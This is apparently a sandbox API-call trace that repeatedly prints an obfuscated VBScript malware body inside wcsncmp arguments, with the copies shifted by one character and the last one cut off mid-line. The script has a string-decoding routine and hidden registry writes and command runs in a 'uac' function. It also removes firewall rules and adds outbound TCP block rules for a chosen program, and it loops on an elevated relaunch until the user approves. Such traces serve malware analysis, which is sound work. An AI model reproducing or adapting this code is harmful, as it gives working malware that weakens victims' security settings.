bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0222.930] wcsncmp (_String1="ave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0222.930] wcsncmp (_String1="ve\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105 [0222.930] wcsncmp (_String1="e\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.930] wcsncmp (_String1="\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 